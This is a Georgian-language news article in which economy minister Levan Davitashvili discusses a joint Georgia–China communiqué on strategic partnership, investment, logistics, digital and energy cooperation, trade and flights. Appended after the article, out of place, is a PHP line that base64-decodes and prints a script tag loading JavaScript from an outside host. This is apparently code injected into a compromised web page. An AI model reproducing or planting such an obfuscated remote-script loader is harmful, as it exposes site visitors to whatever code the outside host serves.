celsiusi
ავერსი საქკაბელი

პრემიერ-მინისტრის ჩინეთში ვიზიტის ფარგლებში გამოქვეყნდა საქართველოსა და ჩინეთის მთავრობების ერთობლივი კომუნიკე, რომელიც რამდენიმე განზომილებას მოიცავს, ზოგადად, კომუნიკე აღნიშნავს, რომ ჩვენი ქვეყნის ურთიერთობა ჩინეთთან გადადის თანამშრომლობის ახალ ეტაპზე და მყარდება სტრატეგიული პარტნიორობა, – ამის შესახებ ეკონომიკის მინისტრმა, ლევან დავითაშვილმა განაცხადა.

მინისტრის თქმით, აღნიშნული კომუნიკე ძალიან მნიშვნელოვანი ნაბიჯია ორი ქვეყნის ურთერთობაში და მოიცავს არაერთ ასპექტს, როგორც პოლიტიკურ, ასევე ეკონომიკურ, სოციალურ-კულტურულ და საგანმანათლებლო განზომილებს.

„არის კომპლექსური თანამშრომლობა ორი ქვეყნის ურთიერთობაში. რაც შეეხება ეკონომიკისა და ბიზნესის მიმართულებით თანამშრომლობას, ესეც ყოვლისმომცველია და შეგვიძლია ვთქვათ, რომ ქვეყნებს შორის ურთიერთობის ყველა პოტენციურ ასპექტს ფარავს. აქ საუბარია თანამშრომლობაზე, როგორც ინვესტიციების მიმართულებით – და ჩვენ მოვიზარებთ, რომ საქართველოში შეიძლება განხორციელდეს ჩინეთიდან მნიშვნელოვანი ინვესტიციები ეკონომიკის სხვადასხვა დარგში – ასევე საუბარია თამაშრომლობაზე ტრანსპორტის, ლოგისტიკისა და კავშირგაბმულობის სფეროებში და აქაც საუბარია ძალიან მჭიდრო თანამშრომლობაზე, რომელიც საშუალებას მისცემს ქვეყანას, რომ განავითაროს სამი მიმართულებით თავისი პრიორიტეტები, რომელიც უკავშირდება ქვეყნის გადაქცევას სატრანსპორტო და ლოგისტიკურ ჰაბად. იცით, ერთ-ერთი პრიორიტეტი ეს არის“, – განაცხადა დავითაშვილმა.

ამასთან, ლევან დავითაშვილის განცხადებით, ჩინეთთან ციფრული ეკონომიკის განვითარების კუთხით თანამშრომლობას აქვს განსაკუთრებული პერსპექტივები.

„მეორე – შეიძლება იყოს საქართველო ციფრული ჰაბი და აქაც ციფრული ეკონომიკის განვითარების კუთხით თანამშრომლობას აქვს განსაკუთრებული პერსპექტივები, ასევე თანამშრომლობა ენერგეტიკის მიმართულებით აღნიშნულია და საქართველო შეიძლება იყოს, მათ შორის, ენერგეტიკული ჰაბი. საქართველოს განსაკუთრებული გეოსტრატეგიული მდებარეობა გააჩნია და ეკონომიკური განვითარების კუთხით ეს არის საფუძველი, მათ შორის, ჩინეთის სახალხო რესპუბლიკასთან ეკონომიკური თანამშრომლობის კუთხითაც. ასევე, საუბარია ტურიზმისა და ვაჭრობის სფეროში თანამშრომლობაზე და იცით, რომ საქართველოსთვის ჩინეთი ერთ-ერთი მნიშვნელოვანი სავაჭრო პარტნიორია, დღეს ის მესამე ადგილს იკავებს, თუმცა ყველა პოტენციალი გააჩნია, რომ ჩინეთი იყოს საქართველოს ერთ-ერთი პირველი სავაჭრო პარტნიორი, გაიზარდოს როგორც ექსპორტი, ისე იმპორტი და სავაჭრო ურთიერთობა წახალისდეს ორივე ქვეყნიდან. საქართველოს გააჩნია თავისუფალი ვაჭრობის შეთანხმება ჩინეთის სახალხო რესპუბლიკასთან და ერთადერთი ქვეყანაა რეგიონში, რომელსაც აქვს თავისუფალი ვაჭრობის რეჟიმი როგორც ევროპასთან, ასევე ჩინეთის სახალხო რესპუბლიკასთან. ასე რომ, ღვინის ექსპორტის თვალსაზრისითაც საქართველოსთვის ჩინეთი ძალიან პერსპექტიულია, პერსპექტიულია ასევე ავიამიმოსვლის კუთხით და აქაც საუბარია იმაზე, რომ თავისუფალი ცის ფარგლებში ჩვენ მეტი კავშირი გვექნება ჩინეთის სხვადასხვა ქალაქთან და, შესაბამისად, ეს პირდაპირ ხელს შეუწყობს ტურისტულ ნაკადს, ეს მნიშვნელოვნად აისახება ქვეყნის ეკონომიკაზე“, – განაცხადა დავითაშვილმა.

337
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");